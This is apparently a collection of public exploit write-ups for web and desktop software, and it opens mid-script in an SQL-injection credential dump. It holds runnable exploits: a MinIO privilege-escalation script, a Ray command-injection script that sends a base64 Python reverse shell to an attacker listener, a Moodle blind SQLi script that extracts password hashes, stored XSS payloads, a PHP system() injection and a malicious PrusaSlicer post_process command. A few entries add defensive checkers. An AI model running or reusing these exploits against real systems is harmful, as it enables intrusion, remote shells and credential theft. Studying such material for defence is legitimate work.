    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -"
    try:
        # HTTP request
        response = requests.get(url)
        response.raise_for_status()  # exception for 4xx and 5xx requests

        # data extraction
        pattern = re.compile(r'enforsec\[(.*?)\]enforsec')
        extracted_data = pattern.search(response.text)
        if extracted_data:
            print("Extracted Admin Users Data:")
            data = extracted_data.group(1)
            rows = data.split('","')
            for row in rows:
                clean_row = row.replace('"', '')
                user_details = clean_row.split(',')
                print(" | ".join(user_details))
        else:
            print("No data extracted.")
    except requests.RequestException as e:
        print(f"HTTP Request failed: {e}")


def main():
    if len(sys.argv) != 2:
        print("Usage: python3 omos_sqli_exploit.py <domain>")
        sys.exit(1)
    fetch_database_names(sys.argv[1])


if __name__ == "__main__":
    main()
-
MinIO < 2024-01-31T20-20-33Z - Privilege Escalation
# Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation
# Date: 2024-04-11
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z
# Tested on: Windows 10
# CVE : CVE-2024-24747
# Required before execution: pip install minio,requests

import argparse
import datetime
import traceback
import urllib.parse
from xml.dom.minidom import parseString
import requests
import json
import base64
from minio.credentials import Credentials
from minio.signer import sign_v4_s3


class CVE_2024_24747:
    new_buckets = []
    old_buckets = []

    def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):
        # Two throwaway buckets: the new service account is only granted pocpublic,
        # so pocprivate becoming visible after console_exp() proves the escalation
        self.bucket_names = ['pocpublic', 'pocprivate']
        self.new_accesskey = 'miniocvepoc'
        self.new_secretkey = 'MINIOcvePOC'
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
            'Content-Type': 'application/json',
            'Accept': '*/*'
        }
        self.accesskey = accesskey
        self.secretkey = secretkey
        self.verify = verify
        if verify:
            self.url = "https://" + host + ":" + port
            self.console_url = "https://" + host + ":" + console_port
        else:
            self.url = "http://" + host + ":" + port
            self.console_url = "http://" + host + ":" + console_port
        self.credits = Credentials(
            access_key=self.new_accesskey,
            secret_key=self.new_secretkey
        )
        self.login()
        try:
            self.create_buckets()
            self.create_accesskey()
            self.old_buckets = self.console_ls()
            self.console_exp()
            self.new_buckets = self.console_ls()
        except Exception:
            traceback.print_exc()
        finally:
            self.delete_accesskey()
            self.delete_buckets()
        if len(self.new_buckets) > len(self.old_buckets):
            print("There is CVE-2024-24747 problem with the minio!")
            print("Before the exploit, the buckets are : " + str(self.old_buckets))
            print("After the exploit, the buckets are : " + str(self.new_buckets))
        else:
            print("There is no CVE-2024-24747 problem with the minio!")

    def login(self):
        url = self.url + "/api/v1/login"
        payload = json.dumps({
            "accessKey": self.accesskey,
            "secretKey": self.secretkey
        })
        self.session = requests.session()
        if self.verify:
            self.session.verify = False
        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
        # print(status_code)
        if status_code == 204:
            status_code = 0
        else:
            print('Login failed! Please check if the input accesskey and secretkey are correct!')
            exit(1)

    def create_buckets(self):
        url = self.url + "/api/v1/buckets"
        for name in self.bucket_names:
            payload = json.dumps({
                "name": name,
                "versioning": False,
                "locking": False
            })
            status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
            # print(status_code)
            if status_code == 200:
                status_code = 0
            else:
                print("Creating bucket " + name + " failed!")

    def delete_buckets(self):
        for name in self.bucket_names:
            url = self.url + "/api/v1/buckets/" + name
            status_code = self.session.request("DELETE", url, headers=self.headers).status_code
            # print(status_code)
            if status_code == 204:
                status_code = 0
            else:
                print("Deleting bucket " + name + " failed!")

    def create_accesskey(self):
        # Service account restricted to pocpublic only
        url = self.url + "/api/v1/service-account-credentials"
        payload = json.dumps({
            "policy": "{ \n \"Version\":\"2012-10-17\", \n \"Statement\":[ \n { \n \"Effect\":\"Allow\", \n \"Action\":[ \n \"s3:*\" \n ], \n \"Resource\":[ \n \"arn:aws:s3:::pocpublic\", \n \"arn:aws:s3:::pocpublic/*\" \n ] \n } \n ] \n}",
            "accessKey": self.new_accesskey,
            "secretKey": self.new_secretkey
        })
        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
        # print(status_code)
        if status_code == 201:
            # print("Creating accessKey " + self.new_accesskey + " succeeded!")
            # print(self.new_secretkey)
            status_code = 0
        else:
            print("Creating accessKey " + self.new_accesskey + " failed!")

    def delete_accesskey(self):
        url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')
        status_code = self.session.request("DELETE", url, headers=self.headers).status_code
        # print(status_code)
        if status_code == 204:
            # print("Deleting accessKey " + self.new_accesskey + " succeeded!")
            status_code = 0
        else:
            print("Deleting accessKey " + self.new_accesskey + " failed!")

    def headers_gen(self, url, sha256, method):
        # SigV4-sign the request with the restricted service account's credentials
        datetimes = datetime.datetime.utcnow()
        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
        urls = urllib.parse.urlparse(url)
        headers = {
            'X-Amz-Content-Sha256': sha256,
            'X-Amz-Date': datetime_str,
            'Host': urls.netloc,
        }
        headers = sign_v4_s3(
            method=method,
            url=urls,
            region='us-east-1',
            headers=headers,
            credentials=self.credits,
            content_sha256=sha256,
            date=datetimes,
        )
        return headers

    def console_ls(self):
        # ListBuckets as the service account; the SHA-256 is that of an empty body
        url = self.console_url + "/"
        sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
        headers = self.headers_gen(url, sha256, 'GET')
        if self.verify:
            response = requests.get(url, headers=headers, verify=False)
        else:
            response = requests.get(url, headers=headers)
        DOMTree = parseString(response.text)
        collection = DOMTree.documentElement
        buckets = collection.getElementsByTagName("Bucket")
        bucket_names = []
        for bucket in buckets:
            bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)
        # print('Buckets currently visible:\n' + str(bucket_names))
        return bucket_names

    def console_exp(self):
        # The service account updates its own policy through the admin API
        url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey
        sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"
        headers = self.headers_gen(url, sha256, 'POST')
        hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"
        content = bytes.fromhex(hex_string)
        if self.verify:
            response = requests.post(url, headers=headers, data=content, verify=False)
        else:
            response = requests.post(url, headers=headers, data=content)
        status_code = response.status_code
        if status_code == 204:
            # print("Privilege escalation for " + self.new_accesskey + " succeeded!")
            status_code = 0
        else:
            print("Privilege escalation for " + self.new_accesskey + " failed!")


if __name__ == '__main__':
    logo = """
        ____   ___  ____  _  _         ____  _  _  _____ _  _  _____      ___ __   __ ___
       |___ \\ / _ \\|___ \\| || |       |___ \\| || ||___ || || ||___ |    / __|\\ \\ / // _ \\
 _____   __) | | | | __) | || |_ _____   __) | || |_  / / | || |_  / /    | (__  \\ V /|  __/
|_____| / __/| |_| |/ __/|__   _|_____| / __/|__   _|/ /  |__   _|/ /      \\___|  \\_/  \\___|
       |_____|\\___/|_____|  |_|       |_____|  |_|/_/      |_|/_/
    """
    print(logo)
    parser = argparse.ArgumentParser()
    parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")
    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
    parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")
    parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")
    parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")
    args = parser.parse_args()
    CVE_2024_24747(args.host, args.port, args.console_port, args.accesskey, args.secretkey, args.https)
-
Terratec dmx_6fire USB - Unquoted Service Path
# Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path
# Google Dork: null
# Date: 4/10/2024
# Exploit Author: Joseph Kwabena Fiagbor
# Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/
# Software Link:
# Version: v.1.23.0.02
# Tested on: windows 7-11
# CVE : CVE-2024-31804

1. Description:

The Terratec dmx_6fire usb installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.

2. Proof

> C:\Users\Astra>sc qc "ttdmx6firesvc"
> [SC] QueryServiceConfig SUCCESS
>
> SERVICE_NAME: ttdmx6firesvc
>         TYPE               : 10  WIN32_OWN_PROCESS
>         START_TYPE         : 2   AUTO_START
>         ERROR_CONTROL      : 1   NORMAL
>         BINARY_PATH_NAME   : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service
>         LOAD_ORDER_GROUP   : PlugPlay
>         TAG                : 0
>         DISPLAY_NAME       : DMX6Fire Control
>         DEPENDENCIES       : eventlog
>                            : PlugPlay
>         SERVICE_START_NAME : LocalSystem
>
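The `sc qc` output above shows the two facts that matter (an unquoted BINARY_PATH_NAME containing a space, and SERVICE_START_NAME = LocalSystem) but not which file a local user would actually have to plant. The following is an added example (not from the advisory author) that parses `sc qc` output and lists the paths CreateProcess tries, in order, before reaching the real executable when the image path is unquoted: for each space in the path, the prefix up to that space with `.exe` appended. The sample input is the advisory's own output, embedded as a constructed string; the check assumes the executable is the shortest prefix ending in `.exe`, which holds for this service.

```python
import re

# Constructed sample: the `sc qc ttdmx6firesvc` output from the advisory above.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ttdmx6firesvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service
        LOAD_ORDER_GROUP   : PlugPlay
        TAG                : 0
        DISPLAY_NAME       : DMX6Fire Control
        DEPENDENCIES       : eventlog
                           : PlugPlay
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict FIELD -> value (first value only;
    continuation lines such as the second DEPENDENCIES entry are skipped)."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m and m.group(1) not in fields:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def hijack_candidates(binary_path_name):
    """Paths CreateProcess tries before the real image for an unquoted path
    with spaces: every space-delimited prefix, with .exe appended. A quoted
    path is unambiguous and yields nothing."""
    cmd = binary_path_name.strip()
    if cmd.startswith('"'):
        return []
    # Assumption: the executable proper is the shortest prefix ending in ".exe";
    # what follows it ("-service" here) is arguments.
    m = re.search(r"\.exe(?=\s|$)", cmd, re.IGNORECASE)
    if not m:
        return []
    exe = cmd[:m.end()]
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def assess_service(sc_qc_text):
    """Summarise the exposure: which account the service runs as and which
    files a local user would need write access to create."""
    fields = parse_sc_qc(sc_qc_text)
    account = fields.get("SERVICE_START_NAME", "")
    candidates = hijack_candidates(fields.get("BINARY_PATH_NAME", ""))
    return {
        "service": fields.get("SERVICE_NAME"),
        "account": account,
        "runs_as_system": account.lower() == "localsystem",
        "unquoted_with_spaces": bool(candidates),
        "candidates": candidates,
    }


if __name__ == "__main__":
    for key, value in assess_service(SC_QC_OUTPUT).items():
        print(f"{key:>22}: {value}")
```

For this service the only candidate is `C:\Program.exe`; whether the path is exploitable by a standard user then depends on whether that user can create files in `C:\` (check with `icacls C:\`), which on a default Windows install requires administrator rights. Paths with more spaces, such as `C:\Program Files\My App\svc.exe`, yield more candidates, and the ones inside vendor directories with loose ACLs are the usual finds.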
-
Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Exploit Title: Ray OS v2.6.3 - Command Injection RCE (Unauthenticated)
# Description:
# The Ray Project dashboard contains a CPU profiling page, and the format parameter is
# not validated before being inserted into a system command executed in a shell, allowing
# for arbitrary command execution. If the system is configured to allow passwordless sudo
# (a setup some Ray configurations require) this will result in a root shell being returned
# to the user. If not configured, a user-level shell will be returned.
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================

```
#!/usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3

proxies = {"http": "127.0.0.1:8080"}  # optional: route through a local intercepting proxy
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
}


def check_url(target, port):
    """Build the base URL: probe plain HTTP first and fall back to HTTPS
    when the probe fails or does not return 200."""
    target_url = target + ":" + port
    if 'http' in target:
        return target_url
    https = 0
    try:
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        test_url = 'http://' + target_url
        response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
        if response.status_code != 200:
            https = 1
    except Exception as e:
        print("ERROR! The Exception is: " + format(e))
        https = 1
    if https == 1:
        return "https://" + target_url
    else:
        return "http://" + target_url


def exp(target, ip, lhost, lport):
    # Python reverse shell, base64-encoded so it survives the shell injection
    payload = ('python3 -c \'import socket,subprocess,os;'
               's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
               's.connect(("' + lhost + '",' + lport + '));'
               'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);'
               'import pty;pty.spawn("/bin/bash")\'')
    print("[*] Payload is: " + payload)
    b64_payload = base64.b64encode(payload.encode())
    print("[*] Base64 encoded payload is: " + b64_payload.decode())
    # The `format` parameter is interpolated into a shell command: the backtick
    # substitution decodes and runs the payload ($IFS stands in for a space).
    exp_url = (target + '/worker/cpu_profile?pid=3354&ip=' + str(ip)
               + '&duration=5&native=0&format=`echo ' + b64_payload.decode()
               + ' |base64$IFS-d|sudo%20sh`')
    print(exp_url)
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, proxies=proxies)
    response = requests.get(url=exp_url, headers=headers, verify=False)
    if response.status_code == 200:
        print("[-] ERROR: Exploit failed, please check the payload.")
    else:
        print("[+] Exploit finished, please check your listener!")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='CVE-2023-6019 - Ray dashboard cpu_profile command injection',
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument('-t', '--target', type=str, required=True, help='target ip')
    parser.add_argument('-p', '--port', type=str, default='80', required=False, help='target host port')
    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
    parser.add_argument('-P', '--lport', type=str, default='80', required=False, help='listening port')
    args = parser.parse_args()
    ip = args.target
    targeturl = check_url(args.target, args.port)
    print("[*] Checking in url: " + targeturl)
    exp(targeturl, ip, args.lhost, args.lport)
```
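The description above is the whole bug: a request parameter reaches a string that is handed to a shell. The following Python, added here as an illustration and not Ray's own code, puts the vulnerable construction next to the hardened one. The `profiler` command line and the allowlisted format names are stand-ins (assumptions), not Ray's actual command or option values; the attack value is the shape of the advisory's payload.

```python
import re
import shlex

# Assumption: the legitimate output formats; Ray's real list may differ.
ALLOWED_FORMATS = ("flamegraph", "speedscope", "raw")

# Characters that change meaning when a value is interpolated into a shell string.
SHELL_META = re.compile(r"[`$|;&<>()\\'\"\s]")

# The advisory's injection: command substitution inside the format parameter.
ATTACK_FORMAT = "`echo aWQ= |base64$IFS-d|sh`"


def build_profile_cmd_vulnerable(pid, duration, fmt):
    """The pattern the advisory describes: the untrusted `format` value is pasted
    into one string that is later executed with shell=True (hypothetical command)."""
    return "profiler -p %s -d %s -f %s -o /tmp/profile.out" % (pid, duration, fmt)


def build_profile_cmd_safe(pid, duration, fmt):
    """Hardened form: strict allowlist on `format`, numerics cast to int, and an
    argv list meant for subprocess.run(..., shell=False), so no metacharacter
    is ever interpreted."""
    if fmt not in ALLOWED_FORMATS:
        raise ValueError("unsupported format: %r" % fmt)
    return ["profiler", "-p", str(int(pid)), "-d", str(int(duration)),
            "-f", fmt, "-o", "/tmp/profile.out"]


def carries_shell_metachars(value):
    """True when interpolating `value` into a shell string would alter the command."""
    return SHELL_META.search(value) is not None


def safe_cmd_for_log(pid, duration, fmt):
    """Render the safe argv for logging; shlex.join quotes anything that needs it."""
    return shlex.join(build_profile_cmd_safe(pid, duration, fmt))


if __name__ == "__main__":
    print(build_profile_cmd_vulnerable(3354, 5, ATTACK_FORMAT))  # payload lands in the shell string
    print(safe_cmd_for_log(3354, 5, "flamegraph"))
    try:
        build_profile_cmd_safe(3354, 5, ATTACK_FORMAT)
    except ValueError as exc:
        print("rejected:", exc)
```

The allowlist is the real fix; the metacharacter check is only useful as a detection signal (for example on request logs), since a denylist can be bypassed while an allowlist cannot.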
-
HTMLy Version v2.9.6 - Stored XSS
# Exploit Title: HTMLy Version v2.9.6 - Stored XSS
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.htmly.com/
# Version 3.10.8.21
# Date : 04/08/2024

1) Log in as admin: https://127.0.0.1/HTMLy/admin/config
2) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)>
3) After saving, the XSS alert fires.
-
Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)
# Date: 22 March 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.32
# Proof Of Concept:
1. Click "Add a new playlist" and enter the XSS payload below into the properties named "Name" or "Playlist ID".
# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns
# Vulnerable Properties name: name, playlist_id
# Payload: "><script>alert(document.cookie)</script>
# Request:

```
POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2
Host: erdemstar.local
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
Content-Length: 178
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000
```
-
PopojiCMS Version 2.0.1 - Remote Command Execution
# Exploit Title: PopojiCMS Version 2.0.1 - Remote Command Execution
# Date: 27/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.popojicms.org/
# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
# Version: 2.0.1
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS

## POC:

1) Log in with admin credentials and click Settings.
2) Click on Config and write your payload in Meta Social: <?php echo system('id'); ?>
3) Open the main page; you will see the output of the id command.

```
POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1
Host: demos5.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: https://demos5.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E
```

Result (system() both prints the output and returns its last line, which is then echoed, hence the duplicate):

uid=1000(soft) gid=1000(soft) groups=1000(soft)
uid=1000(soft) gid=1000(soft) groups=1000(soft)
-
Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - "sort" parameter
# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter
# Google Dork:
# Date: 04/11/2023
# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)
# Vendor Homepage: https://moodle.org/
# Software Link:
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2021-36393

```
import requests
import string
from termcolor import colored

# Request details: sesskey and MoodleSession must belong to a logged-in user
URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"
HEADERS = {
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Content-Type": "application/json",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
    "Origin": "http://127.0.0.1:8080",
    "Referer": "http://127.0.0.1:8080/moodle/my/",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en-US,en;q=0.9",
    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",
    "Connection": "close"
}

SLEEP_SECONDS = 3

# Characters to test (the set contains no backslash or percent sign)
characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"


def like_literal(prefix):
    """Escape a recovered prefix for use inside a single-quoted LIKE pattern:
    quotes are doubled and '_' (a LIKE wildcard) is escaped, so each guess
    matches only itself instead of any character."""
    return prefix.replace("'", "''").replace("_", "\\_")


def test_character(payload):
    response = requests.post(URL, headers=HEADERS, json=[payload])
    return response.elapsed.total_seconds() >= SLEEP_SECONDS


def extract_value(column, label):
    base_payload = {
        "index": 0,
        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",
        "args": {
            "offset": 0,
            "limit": 0,
            "classification": "all",
            "sort": "",
            "customfieldname": "",
            "customfieldvalue": ""
        }
    }
    result = ""
    for _ in range(50):  # Assumes a maximum of 50 characters for the value
        character_found = False
        for character in characters_to_test:
            pattern = like_literal(result + character) + "%"
            # LIKE BINARY keeps the comparison case-sensitive, which matters for password hashes
            if column == "database()":
                condition = f"(database()) LIKE BINARY '{pattern}'"
            else:
                condition = f"(SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE BINARY '{pattern}'"
            base_payload["args"]["sort"] = f"fullname OR {condition} AND SLEEP({SLEEP_SECONDS})"
            if test_character(base_payload):
                result += character
                print(colored(f"{label}: {result}", 'red'), end="\r")
                character_found = True
                break
        if not character_found:
            break
    # Print the final result
    print(colored(f"{label}: {result}", 'red'))


if __name__ == "__main__":
    extract_value("database()", "Database")
    extract_value("username", "Username")
    extract_value("password", "Password")
```
-
PrusaSlicer 2.6.1 - Arbitrary code execution
# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export
# Date: 16/01/2024
# Exploit Author: Kamil Breński
# Vendor Homepage: https://www.prusa3d.com
# Software Link: https://github.com/prusa3d/PrusaSlicer
# Version: PrusaSlicer up to and including version 2.6.1
# Tested on: Windows and Linux
# CVE: CVE-2023-47268

==========================================================================================
1.) 3mf Metadata extension
==========================================================================================

PrusaSlicer 3mf project (zip) archives contain the file 'Metadata/Slic3r_PE.config', which describes various project settings; this is an extension to the regular 3mf format, and PrusaSlicer parses the additional file to read those settings. One of the settings, post_process, is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913). This feature has great potential for abuse, as it allows a malicious user to craft an evil 3mf project that executes arbitrary code when the targeted user exports g-code from it. A project file only needs to be modified to carry a post_process setting in order to execute arbitrary code; this is demonstrated on both a Windows and a Linux host as follows.

==========================================================================================
2.) PoC
==========================================================================================

For the Linux PoC, this CLI command is enough to execute the payload contained in the project: './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:

```
; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"
```

Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code.

For the Windows PoC with the GUI, the malicious 3mf file needs to be opened as a project file (or its settings imported). After exporting, a pop-up launched by the payload will appear. The Windows PoC contains this entry:

```
; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) "
```
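Because the dangerous setting lives in a plain-text member of a zip, a project received from an untrusted source can be checked before it is ever opened in the slicer. The following Python is an added example, not code from the advisory or from PrusaSlicer: it builds a constructed sample 3mf carrying the Linux PoC's post_process entry (the model XML is a placeholder), parses the '; key = value' config lines, and reports any post_process command it finds.

```python
import io
import re
import zipfile

CONFIG_MEMBER = "Metadata/Slic3r_PE.config"
# The post_process command from the advisory's Linux PoC, reused as sample data.
SAMPLE_POST_PROCESS = "/usr/bin/id > /tmp/hax #"

CONFIG_LINE = re.compile(r"^;\s*([A-Za-z0-9_]+)\s*=\s*(.*)$")


def build_sample_3mf(post_process_value):
    """Constructed sample archive. Only the config member matters for this check,
    so the rest of a real 3mf is reduced to a placeholder; pass None to build an
    archive without the PrusaSlicer config member at all."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("3D/3dmodel.model", "<model/>")  # placeholder, not a valid model
        if post_process_value is not None:
            zf.writestr(CONFIG_MEMBER,
                        "; generated by PrusaSlicer\n"
                        "; layer_height = 0.2\n"
                        "; post_process = \"%s\"\n" % post_process_value)
    return buf.getvalue()


def parse_slic3r_config(text):
    """Parse the '; key = value' lines of Slic3r_PE.config into a dict."""
    cfg = {}
    for line in text.splitlines():
        m = CONFIG_LINE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def find_post_process(archive_bytes):
    """Return the post_process command carried by a 3mf, or None when the archive
    has no PrusaSlicer config member or the setting is empty. Any non-empty value
    is a command that runs on g-code export and should be reviewed first."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        if CONFIG_MEMBER not in zf.namelist():
            return None
        cfg = parse_slic3r_config(zf.read(CONFIG_MEMBER).decode("utf-8", "replace"))
    value = cfg.get("post_process", "")
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        value = value[1:-1]
    return value or None


if __name__ == "__main__":
    for label, data in (("malicious", build_sample_3mf(SAMPLE_POST_PROCESS)),
                        ("clean", build_sample_3mf(""))):
        print(label, "->", find_post_process(data))
```

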